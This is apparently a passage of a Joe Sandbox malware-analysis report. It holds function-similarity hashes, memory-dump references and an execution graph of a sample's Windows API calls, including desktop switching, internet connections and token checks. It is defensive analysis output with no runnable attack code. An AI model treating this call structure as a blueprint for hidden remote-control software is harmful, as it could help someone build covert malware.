                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$Text$ClientItemLong
                                                                                      • String ID: 0
                                                                                      • API String ID: 660763476-4108050209
                                                                                      • Opcode ID: 93c2a0b6b4665109c2dbcc0e03d69093e63e94a5d6e2849481ec236446e41bf1
                                                                                      • Instruction ID: 4758255fbcd3a864ecc9d94837beb94ba367343ad98bc1b2433b32d48781660a
                                                                                      • Opcode Fuzzy Hash: 93c2a0b6b4665109c2dbcc0e03d69093e63e94a5d6e2849481ec236446e41bf1
                                                                                      • Instruction Fuzzy Hash: 02F0A4B5540348ABDF160F688C0AAF93F599B05744F0CC214FE4C94591EB79D450EB34
                                                                                      Function 00D978A2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free
                                                                                      • String ID: FlsFree$d0F
                                                                                      • API String ID: 3978063606-773397603
                                                                                      • Opcode ID: 14409069d1883c966663cbecc4bcb801403aa85165208f897ddf749635c0dbee
                                                                                      • Instruction ID: 9470b619e4b2967d98970a07136f864c3245d669bd25777d381a65289d920133
                                                                                      • Opcode Fuzzy Hash: 14409069d1883c966663cbecc4bcb801403aa85165208f897ddf749635c0dbee
                                                                                      • Instruction Fuzzy Hash: 8FE0E5B5B453187F8704BF659C0AA7EBB91DF46B10F140159F90697280DA715E00D6F9
                                                                                      Function 00D7FAC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,00D7FD0B,?,?,00D7FD80,?,?,?,?,?,00D7FD6A), ref: 00D7FACD
                                                                                      • GetLastError.KERNEL32(?,?,00D7FD80,?,?,?,?,?,00D7FD6A), ref: 00D7FAD9
                                                                                        • Part of subcall function 00D76DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D76DF1
                                                                                      Strings
                                                                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D7FAE2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                      • API String ID: 1091760877-2248577382
                                                                                      • Opcode ID: 388e49078b4b9ed039898d9d517c51925796654e8de3e3b65f6a9774976d61bd
                                                                                      • Instruction ID: 9f77932bfa73fa452b38e99fb001f80f0cbef0cc39de1ed4272125dab546e430
                                                                                      • Opcode Fuzzy Hash: 388e49078b4b9ed039898d9d517c51925796654e8de3e3b65f6a9774976d61bd
                                                                                      • Instruction Fuzzy Hash: 08D05E71618A312BD62137289C0AE6E3D049F13770F248716F13EA52E5EB614C5142B6

                                                                                      Execution Graph

                                                                                      Execution Coverage:5.1%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:14.8%
                                                                                      Total number of Nodes:2000
                                                                                      Total number of Limit Nodes:112
                                                                                      execution_graph 94190 11108d30 94233 1110f420 94190->94233 94193 11108da9 OpenEventA 94196 11108ed1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 94193->94196 94197 11108e18 CloseHandle GetSystemDirectoryA 94193->94197 94198 1110f420 std::_Mutex::_Mutex 265 API calls 94196->94198 94199 11108e38 94197->94199 94200 11108f23 94198->94200 94199->94199 94201 11108e40 LoadLibraryA 94199->94201 94202 11108f3c 94200->94202 94310 110f4680 268 API calls std::_Mutex::_Mutex 94200->94310 94201->94196 94203 11108e71 94201->94203 94261 1110f2b0 94202->94261 94277 111450a0 94203->94277 94206 11108e7b 94208 11108e82 GetProcAddress 94206->94208 94209 11108e9a GetProcAddress 94206->94209 94208->94209 94212 11108ec4 FreeLibrary 94209->94212 94213 11108eb6 94209->94213 94212->94196 94213->94196 94215 11109005 94313 11161d01 94215->94313 94216 1110f420 std::_Mutex::_Mutex 265 API calls 94218 11108f73 94216->94218 94220 11108f84 94218->94220 94221 11108f8d 94218->94221 94219 1110901f 94311 110f4680 268 API calls std::_Mutex::_Mutex 94220->94311 94223 1110f2b0 425 API calls 94221->94223 94224 11108fa9 CloseHandle 94223->94224 94225 111450a0 std::_Mutex::_Mutex 90 API calls 94224->94225 94226 11108fba 94225->94226 94226->94215 94227 1110f420 std::_Mutex::_Mutex 265 API calls 94226->94227 94228 11108fc8 94227->94228 94229 11108fe2 94228->94229 94312 110f4680 268 API calls std::_Mutex::_Mutex 94228->94312 94231 1110f2b0 425 API calls 94229->94231 94232 11108ffe CloseHandle 94231->94232 94232->94215 94321 11162b51 94233->94321 94236 1110f447 wsprintfA 94338 11029450 265 API calls 2 library calls 94236->94338 94238 1110f473 _memset 94240 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94238->94240 94241 11108d91 94240->94241 94241->94193 94242 11107290 94241->94242 94347 1110f520 94242->94347 94245 1110f520 3 API calls 94246 111072dc 94245->94246 94247 1110f520 3 API calls 94246->94247 94248 111072ee 94247->94248 94249 1110f520 3 API calls 94248->94249 94250 111072ff 94249->94250 94251 1110f520 3 API calls 94250->94251 94252 11107310 94251->94252 94253 1110f420 std::_Mutex::_Mutex 265 API calls 94252->94253 94254 11107321 94253->94254 94255 1110740a 94254->94255 94256 1110732c LoadLibraryA LoadLibraryA 94254->94256 94354 1116219a 66 API calls std::exception::_Copy_str 94255->94354 94256->94193 94258 11107419 94355 111625f1 RaiseException 94258->94355 94260 1110742e 94262 1110f2d0 CreateThread 94261->94262 94263 1110f2bf CreateEventA 94261->94263 94265 1110f2f6 94262->94265 94266 1110f30d 94262->94266 94359 11102c50 94262->94359 94381 1110fde0 94262->94381 94395 11027270 94262->94395 94420 1102c410 94262->94420 94263->94262 94358 11029450 265 API calls 2 library calls 94265->94358 94268 1110f311 WaitForSingleObject CloseHandle 94266->94268 94269 11108f58 CloseHandle 94266->94269 94268->94269 94271 1109e9e0 94269->94271 94272 1109e9ef GetCurrentProcess OpenProcessToken 94271->94272 94273 1109ea2d 94271->94273 94272->94273 94274 1109ea12 94272->94274 94273->94215 94273->94216 94813 1109e910 94274->94813 94276 1109ea1b CloseHandle 94276->94273 94278 111450c1 GetVersionExA 94277->94278 94279 1114529c 94277->94279 94278->94279 94280 111450e3 94278->94280 94281 111452a5 94279->94281 94285 11145304 94279->94285 94837 11081c60 94279->94837 94280->94279 94282 111450f0 RegOpenKeyExA 94280->94282 94283 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94281->94283 94282->94279 94287 1114511d _memset 94282->94287 94284 111452b2 94283->94284 94284->94206 94286 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94285->94286 94288 11145314 94286->94288 94826 11143000 RegQueryValueExA 94287->94826 94288->94206 94292 111452ec 94292->94281 94295 11162de7 std::_Mutex::_Mutex 79 API calls 94292->94295 94293 11143000 std::_Mutex::_Mutex RegQueryValueExA 94294 11145189 94293->94294 94296 1114528f RegCloseKey 94294->94296 94828 11162de7 94294->94828 94297 111452fd 94295->94297 94296->94279 94297->94281 94297->94285 94301 111451ad 94302 111451c6 94301->94302 94303 11163a2d std::_Mutex::_Mutex 79 API calls 94301->94303 94304 11162de7 std::_Mutex::_Mutex 79 API calls 94302->94304 94303->94301 94306 111451d2 _strncpy 94304->94306 94305 11145271 94305->94296 94306->94305 94307 11143000 std::_Mutex::_Mutex RegQueryValueExA 94306->94307 94308 11145248 94307->94308 94309 11143000 std::_Mutex::_Mutex RegQueryValueExA 94308->94309 94309->94305 94310->94202 94311->94221 94312->94229 94314 11161d0b IsDebuggerPresent 94313->94314 94315 11161d09 94313->94315 94985 11177637 94314->94985 94315->94219 94318 1116bc99 SetUnhandledExceptionFilter UnhandledExceptionFilter 94319 1116bcbe GetCurrentProcess TerminateProcess 94318->94319 94320 1116bcb6 __call_reportfault 94318->94320 94319->94219 94320->94319 94322 11162bce 94321->94322 94335 11162b5f 94321->94335 94345 1116d4a8 DecodePointer 94322->94345 94324 11162b6a 94324->94335 94339 1116d99d 66 API calls 2 library calls 94324->94339 94340 1116d7ee 66 API calls 7 library calls 94324->94340 94341 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 94324->94341 94325 11162bd4 94346 111692ef 66 API calls __getptd_noexit 94325->94346 94328 11162b8d RtlAllocateHeap 94329 1110f43e 94328->94329 94328->94335 94329->94236 94329->94238 94331 11162bba 94343 111692ef 66 API calls __getptd_noexit 94331->94343 94335->94324 94335->94328 94335->94331 94336 11162bb8 94335->94336 94342 1116d4a8 DecodePointer 94335->94342 94344 111692ef 66 API calls __getptd_noexit 94336->94344 94339->94324 94340->94324 94342->94335 94343->94336 94344->94329 94345->94325 94346->94329 94348 1110f536 CreateEventA 94347->94348 94349 1110f549 94347->94349 94348->94349 94350 1110f557 94349->94350 94356 1110f260 InterlockedIncrement 94349->94356 94351 111072cc 94350->94351 94357 1110f3c0 InterlockedIncrement 94350->94357 94351->94245 94354->94258 94355->94260 94356->94350 94357->94351 94455 11089280 94359->94455 94361 11102c5d 94362 11102c69 GetCurrentThreadId GetThreadDesktop OpenDesktopA 94361->94362 94363 11102ccf GetLastError 94362->94363 94364 11102c8f SetThreadDesktop 94362->94364 94367 11146450 std::_Mutex::_Mutex 21 API calls 94363->94367 94365 11102cb1 GetLastError 94364->94365 94366 11102c9a 94364->94366 94369 11146450 std::_Mutex::_Mutex 21 API calls 94365->94369 94466 11146450 94366->94466 94370 11102ce1 94367->94370 94372 11102cc3 CloseDesktop 94369->94372 94460 11102bd0 94370->94460 94372->94370 94374 11102ceb 94472 1110f340 94374->94472 94376 11102cf2 94477 110f4740 16 API calls 94376->94477 94378 11102cf9 94478 1110f370 SetEvent PulseEvent 94378->94478 94380 11102d00 std::ios_base::_Tidy 94531 110b7a20 94381->94531 94383 1110fdee GetCurrentThreadId 94384 1110f340 266 API calls 94383->94384 94393 1110fe09 std::ios_base::_Tidy 94384->94393 94385 1110fe80 94535 1110f370 SetEvent PulseEvent 94385->94535 94387 1110fe20 WaitForSingleObject 94533 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 94387->94533 94388 1110fe8a 94390 1110fe43 94391 1110fe53 PostMessageA 94390->94391 94392 1110fe58 PostThreadMessageA 94390->94392 94391->94393 94392->94393 94393->94385 94393->94387 94393->94390 94534 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 94393->94534 94396 110272a2 94395->94396 94397 11089280 5 API calls 94396->94397 94398 110272a9 CreateEventA 94397->94398 94399 1110f420 std::_Mutex::_Mutex 265 API calls 94398->94399 94400 110272c6 94399->94400 94401 110272e7 94400->94401 94536 111100d0 94400->94536 94403 1110f340 266 API calls 94401->94403 94404 110272ff 94403->94404 94405 11027316 WaitForMultipleObjects 94404->94405 94409 110273f4 94404->94409 94411 11027375 PostMessageA 94404->94411 94417 110273ba GetCurrentThreadId GetThreadDesktop 94404->94417 94564 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 94404->94564 94405->94404 94406 1102732d 94405->94406 94407 11027336 PostMessageA 94406->94407 94408 1102734a SetEvent Sleep 94406->94408 94407->94404 94407->94408 94408->94404 94410 1102740e CloseHandle 94409->94410 94565 1110fc70 278 API calls 2 library calls 94409->94565 94566 1110f370 SetEvent PulseEvent 94410->94566 94411->94404 94414 11027405 std::ios_base::_Tidy 94414->94410 94415 11027423 94417->94404 94418 110273c9 SetThreadDesktop 94417->94418 94418->94404 94419 110273d4 CloseDesktop 94418->94419 94419->94404 94421 1102c442 94420->94421 94422 1110f340 266 API calls 94421->94422 94423 1102c44f WaitForSingleObject 94422->94423 94424 1102c466 94423->94424 94425 1102c67d 94423->94425 94427 1102c470 GetTickCount 94424->94427 94428 1102c666 WaitForSingleObject 94424->94428 94665 1110f370 SetEvent PulseEvent 94425->94665 94570 110d1550 94427->94570 94428->94424 94428->94425 94430 1102c684 CloseHandle 94666 1110f580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 94430->94666 94432 110d1550 268 API calls 94445 1102c486 94432->94445 94433 1102c695 std::ios_base::_Tidy 94435 1102c6b4 94667 11029450 265 API calls 2 library calls 94435->94667 94437 1102c6c8 94668 11029450 265 API calls 2 library calls 94437->94668 94439 1102c6dc 94669 11029450 265 API calls 2 library calls 94439->94669 94442 1102c6f0 94670 11029450 265 API calls 2 library calls 94442->94670 94444 1102c574 GetTickCount 94454 1102c571 std::ios_base::_Tidy 94444->94454 94445->94432 94445->94435 94445->94437 94445->94439 94445->94444 94580 110d0710 94445->94580 94592 11029590 LoadLibraryA 94445->94592 94645 110d1370 269 API calls 2 library calls 94445->94645 94447 11146450 std::_Mutex::_Mutex 21 API calls 94447->94454 94449 110d07c0 265 API calls 94449->94454 94452 110679c0 298 API calls 94452->94454 94454->94435 94454->94437 94454->94442 94454->94444 94454->94447 94454->94449 94454->94452 94646 11142290 94454->94646 94655 11042530 267 API calls 2 library calls 94454->94655 94656 110d07c0 94454->94656 94479 1110f6c0 94455->94479 94457 11089290 94458 110892b3 94457->94458 94459 110892a2 UnhookWindowsHookEx 94457->94459 94458->94361 94459->94458 94461 1110f420 std::_Mutex::_Mutex 265 API calls 94460->94461 94462 11102bfd 94461->94462 94463 11102c30 94462->94463 94485 11102ab0 94462->94485 94463->94374 94465 11102c1d 94465->94374 94467 11146461 94466->94467 94468 1114645c 94466->94468 94505 111458f0 94467->94505 94508 111456a0 18 API calls std::_Mutex::_Mutex 94468->94508 94473 1110f360 SetEvent 94472->94473 94474 1110f349 94472->94474 94473->94376 94530 11029450 265 API calls 2 library calls 94474->94530 94477->94378 94478->94380 94480 1110f6d7 EnterCriticalSection 94479->94480 94481 1110f6ce GetCurrentThreadId 94479->94481 94482 1110f6ee ___DllMainCRTStartup 94480->94482 94481->94480 94483 1110f6f5 LeaveCriticalSection 94482->94483 94484 1110f708 LeaveCriticalSection 94482->94484 94483->94457 94484->94457 94492 1115f550 94485->94492 94488 11102b81 CreateWindowExA 94488->94465 94489 11102b17 std::_Mutex::_Mutex 94490 11102b50 GetStockObject RegisterClassA 94489->94490 94490->94488 94491 11102b7a 94490->94491 94491->94488 94495 1115e380 GlobalAddAtomA 94492->94495 94496 1115e3b5 GetLastError wsprintfA 94495->94496 94497 1115e407 GlobalAddAtomA GlobalAddAtomA 94495->94497 94504 11029450 265 API calls 2 library calls 94496->94504 94499 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94497->94499 94501 11102ae1 GlobalAddAtomA 94499->94501 94501->94488 94501->94489 94509 111457a0 94505->94509 94507 11102ca5 CloseDesktop 94507->94370 94508->94467 94510 111457c4 94509->94510 94511 111457c9 94509->94511 94529 111456a0 18 API calls std::_Mutex::_Mutex 94510->94529 94513 11145832 94511->94513 94514 111457d2 94511->94514 94515 111458de 94513->94515 94516 1114583f wsprintfA 94513->94516 94517 11145809 94514->94517 94518 111457e0 94514->94518 94519 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94515->94519 94520 11145862 94516->94520 94523 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94517->94523 94525 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94518->94525 94522 111458ea 94519->94522 94520->94520 94521 11145869 wvsprintfA 94520->94521 94528 11145884 94521->94528 94522->94507 94524 1114582e 94523->94524 94524->94507 94526 11145805 94525->94526 94526->94507 94527 111458d1 OutputDebugStringA 94527->94515 94528->94527 94528->94528 94529->94511 94532 110b7a28 std::_Mutex::_Mutex 94531->94532 94532->94383 94533->94393 94534->94393 94535->94388 94537 1110f420 std::_Mutex::_Mutex 265 API calls 94536->94537 94538 11110101 94537->94538 94539 11110123 GetCurrentThreadId InitializeCriticalSection 94538->94539 94540 1110f420 std::_Mutex::_Mutex 265 API calls 94538->94540 94543 11110190 EnterCriticalSection 94539->94543 94544 11110183 InitializeCriticalSection 94539->94544 94542 1111011c 94540->94542 94542->94539 94567 1116219a 66 API calls std::exception::_Copy_str 94542->94567 94545 1111024a LeaveCriticalSection 94543->94545 94546 111101be CreateEventA 94543->94546 94544->94543 94545->94401 94547 111101d1 94546->94547 94548 111101e8 94546->94548 94569 11029450 265 API calls 2 library calls 94547->94569 94551 1110f420 std::_Mutex::_Mutex 265 API calls 94548->94551 94554 111101ef 94551->94554 94552 1111013f 94568 111625f1 RaiseException 94552->94568 94556 1111020c 94554->94556 94557 111100d0 419 API calls 94554->94557 94558 1110f420 std::_Mutex::_Mutex 265 API calls 94556->94558 94557->94556 94559 1111021c 94558->94559 94560 1111022d 94559->94560 94561 1110f520 3 API calls 94559->94561 94562 1110f2b0 419 API calls 94560->94562 94561->94560 94563 11110245 94562->94563 94563->94545 94564->94404 94565->94414 94566->94415 94567->94552 94568->94539 94671 110d1480 94570->94671 94573 110d159b 94576 110d15b5 94573->94576 94577 110d1598 94573->94577 94574 110d1584 94685 11029450 265 API calls 2 library calls 94574->94685 94576->94445 94577->94573 94686 11029450 265 API calls 2 library calls 94577->94686 94581 110d0724 94580->94581 94744 11163cf8 94581->94744 94584 110d0450 265 API calls 94585 110d0753 94584->94585 94752 110cfe70 94585->94752 94588 110d077c 94588->94445 94589 110d0765 94764 11029450 265 API calls 2 library calls 94589->94764 94600 11029621 std::ios_base::_Tidy 94592->94600 94593 11029653 GetProcAddress 94594 1102966c InternetCloseHandle 94593->94594 94595 11029671 SetLastError 94593->94595 94594->94600 94595->94600 94596 11162b51 66 API calls _malloc 94596->94600 94597 11029748 InternetOpenA 94597->94600 94598 1102972f GetProcAddress 94598->94597 94599 11029779 SetLastError 94598->94599 94599->94600 94600->94593 94600->94594 94600->94596 94600->94597 94600->94598 94601 110296a5 GetProcAddress 94600->94601 94603 110296d2 GetLastError 94600->94603 94604 11142290 std::_Mutex::_Mutex 265 API calls 94600->94604 94605 110296f5 GetProcAddress 94600->94605 94606 11162be5 66 API calls _free 94600->94606 94612 11081a70 IsDBCSLeadByte 94600->94612 94620 1102982b GetProcAddress 94600->94620 94621 1102983e InternetConnectA 94600->94621 94623 110297ff GetProcAddress 94600->94623 94628 11029864 GetProcAddress 94600->94628 94629 110298a3 GetProcAddress 94600->94629 94635 110298f1 GetProcAddress 94600->94635 94636 11029a1a std::ios_base::_Tidy 94600->94636 94638 11029922 GetLastError 94600->94638 94641 11029975 GetLastError 94600->94641 94642 1102998c GetDesktopWindow 94600->94642 94601->94600 94602 11029762 SetLastError 94601->94602 94602->94603 94603->94600 94604->94600 94605->94600 94607 1102976f SetLastError 94605->94607 94606->94600 94607->94600 94608 11029a31 94610 11029bb0 94608->94610 94611 11029ba9 FreeLibrary 94608->94611 94609 11029a40 94609->94608 94614 11029b76 GetProcAddress 94609->94614 94610->94454 94611->94610 94612->94600 94613 11029a57 GetProcAddress 94616 11029b2e SetLastError 94613->94616 94613->94636 94614->94608 94615 11029b97 SetLastError 94614->94615 94615->94608 94634 11029b36 std::ios_base::_Tidy 94616->94634 94619 11029b5b 94798 110278a0 GetProcAddress SetLastError 94619->94798 94620->94621 94625 11029881 SetLastError 94620->94625 94621->94600 94623->94600 94627 1102981c SetLastError 94623->94627 94625->94600 94626 11029b6a 94626->94609 94627->94600 94628->94600 94631 11029891 SetLastError 94628->94631 94629->94600 94630 110298d6 SetLastError 94629->94630 94630->94600 94631->94600 94632 110d1090 268 API calls 94633 11029a80 std::ios_base::_Tidy 94632->94633 94633->94632 94633->94634 94633->94636 94789 1110f4a0 94633->94789 94796 11027850 GetProcAddress SetLastError 94633->94796 94797 110278a0 GetProcAddress SetLastError 94634->94797 94635->94600 94637 11029918 SetLastError 94635->94637 94636->94608 94636->94609 94636->94613 94636->94633 94637->94638 94638->94600 94639 1102993d GetProcAddress 94638->94639 94639->94600 94640 1102996d SetLastError 94639->94640 94640->94641 94641->94600 94641->94642 94642->94600 94643 1102999a GetProcAddress 94642->94643 94643->94600 94644 110299d6 SetLastError 94643->94644 94644->94600 94645->94445 94647 1114229c 94646->94647 94648 1114229a 94646->94648 94649 1110f4a0 std::_Mutex::_Mutex 265 API calls 94647->94649 94648->94454 94650 111422c2 94649->94650 94651 111422cb _strncpy 94650->94651 94652 111422e9 94650->94652 94651->94454 94800 11029450 265 API calls 2 library calls 94652->94800 94655->94454 94801 110d05c0 94656->94801 94659 110d07e9 94806 11162be5 94659->94806 94660 110d07d2 94805 11029450 265 API calls 2 library calls 94660->94805 94664 110d07f2 94664->94428 94665->94430 94666->94433 94672 110d148c 94671->94672 94673 110d14a7 94672->94673 94674 110d1490 94672->94674 94687 110d0190 94673->94687 94716 11029450 265 API calls 2 library calls 94674->94716 94681 110d14de 94681->94573 94681->94574 94682 110d14c7 94717 11029450 265 API calls 2 library calls 94682->94717 94688 110d0199 94687->94688 94689 110d019d 94688->94689 94690 110d01b4 94688->94690 94718 11029450 265 API calls 2 library calls 94689->94718 94692 110d01b1 94690->94692 94693 110d01e8 94690->94693 94692->94690 94719 11029450 265 API calls 2 library calls 94692->94719 94695 110d01e5 94693->94695 94696 110d0206 94693->94696 94695->94693 94720 11029450 265 API calls 2 library calls 94695->94720 94699 110d1090 94696->94699 94700 110d109e 94699->94700 94701 110d10b9 94700->94701 94702 110d10a2 94700->94702 94704 110d10b6 94701->94704 94706 110d10ec 94701->94706 94721 11029450 265 API calls 2 library calls 94702->94721 94704->94701 94722 11029450 265 API calls 2 library calls 94704->94722 94705 110d1160 94705->94681 94705->94682 94706->94705 94706->94706 94723 110d09e0 94706->94723 94712 110d111f _memmove 94712->94705 94713 110d1149 94712->94713 94735 11029450 265 API calls 2 library calls 94713->94735 94724 110d09ed 94723->94724 94725 110d0a08 94724->94725 94726 110d09f1 94724->94726 94728 110d0a05 94725->94728 94729 110d0a26 94725->94729 94741 11029450 265 API calls 2 library calls 94726->94741 94728->94725 94742 11029450 265 API calls 2 library calls 94728->94742 94736 110d0450 94729->94736 94734 110d0920 268 API calls 2 library calls 94734->94712 94737 110d045b 94736->94737 94738 110d0472 94736->94738 94743 11029450 265 API calls 2 library calls 94737->94743 94738->94712 94738->94734 94745 110d072f 94744->94745 94746 11163d09 _strlen 94744->94746 94745->94584 94747 11162b51 _malloc 66 API calls 94746->94747 94748 11163d1c 94747->94748 94748->94745 94765 1116be9f 94748->94765 94753 110cfe7d 94752->94753 94754 110cfe98 94753->94754 94755 110cfe81 94753->94755 94757 110cfe95 94754->94757 94758 110cfeb6 94754->94758 94786 11029450 265 API calls 2 library calls 94755->94786 94757->94754 94787 11029450 265 API calls 2 library calls 94757->94787 94760 110cfeb3 94758->94760 94763 110cfed9 94758->94763 94760->94758 94788 11029450 265 API calls 2 library calls 94760->94788 94763->94588 94763->94589 94766 1116beb4 94765->94766 94767 1116bead 94765->94767 94777 111692ef 66 API calls __getptd_noexit 94766->94777 94767->94766 94771 1116bed2 94767->94771 94769 1116beb9 94778 1116df04 11 API calls __gmtime64_s 94769->94778 94772 11163d2e 94771->94772 94779 111692ef 66 API calls __getptd_noexit 94771->94779 94772->94745 94774 1116deb2 94772->94774 94780 1116dd89 94774->94780 94777->94769 94778->94772 94779->94769 94781 1116dda8 _memset __call_reportfault 94780->94781 94782 1116ddc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 94781->94782 94783 1116de94 __call_reportfault 94782->94783 94784 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94783->94784 94785 1116deb0 GetCurrentProcess TerminateProcess 94784->94785 94785->94745 94790 11162b51 _malloc 66 API calls 94789->94790 94791 1110f4ae 94790->94791 94792 1110f4b7 94791->94792 94793 1110f4ce _memset 94791->94793 94799 11029450 265 API calls 2 library calls 94792->94799 94793->94633 94796->94633 94797->94619 94798->94626 94802 110d05d9 94801->94802 94803 110d05ec 94801->94803 94802->94803 94804 110d0450 265 API calls 94802->94804 94803->94659 94803->94660 94804->94803 94807 11162bf0 HeapFree 94806->94807 94808 11162c19 __dosmaperr 94806->94808 94807->94808 94809 11162c05 94807->94809 94808->94664 94812 111692ef 66 API calls __getptd_noexit 94809->94812 94811 11162c0b GetLastError 94811->94808 94812->94811 94814 1109e9c6 94813->94814 94815 1109e930 GetTokenInformation 94813->94815 94817 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94814->94817 94816 1109e952 _strupr_s_l_stat 94815->94816 94816->94814 94819 1109e958 GetTokenInformation 94816->94819 94818 1109e9d8 94817->94818 94818->94276 94819->94814 94820 1109e96a 94819->94820 94821 1109e99f EqualSid 94820->94821 94822 1109e973 AllocateAndInitializeSid 94820->94822 94821->94814 94823 1109e9ad 94821->94823 94822->94814 94822->94821 94824 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94823->94824 94825 1109e9c2 94824->94825 94825->94276 94827 1114302a 94826->94827 94827->94293 94829 11162dd1 94828->94829 94847 1116364b 94829->94847 94832 11163a2d 94833 11163a4d 94832->94833 94834 11163a3b 94832->94834 94982 111639dc 79 API calls 2 library calls 94833->94982 94834->94301 94836 11163a57 94836->94301 94838 11081c6d 94837->94838 94839 11081c72 94837->94839 94983 11081990 IsDBCSLeadByte 94838->94983 94841 11081c7b 94839->94841 94846 11081c93 94839->94846 94984 11163784 85 API calls 2 library calls 94841->94984 94843 11081c8c 94843->94292 94844 11081c99 94844->94292 94845 11165797 85 API calls std::_Mutex::_Mutex 94845->94846 94846->94844 94846->94845 94848 11163664 94847->94848 94851 11163420 94848->94851 94863 11163399 94851->94863 94853 11163444 94871 111692ef 66 API calls __getptd_noexit 94853->94871 94856 11163449 94872 1116df04 11 API calls __gmtime64_s 94856->94872 94858 1114519e 94858->94832 94860 1116347a 94861 111634c1 94860->94861 94873 11170c05 79 API calls 3 library calls 94860->94873 94861->94858 94874 111692ef 66 API calls __getptd_noexit 94861->94874 94864 111633ac 94863->94864 94868 111633f9 94863->94868 94875 1116b7b5 94864->94875 94867 111633d9 94867->94868 94895 11170744 68 API calls 6 library calls 94867->94895 94868->94853 94868->94860 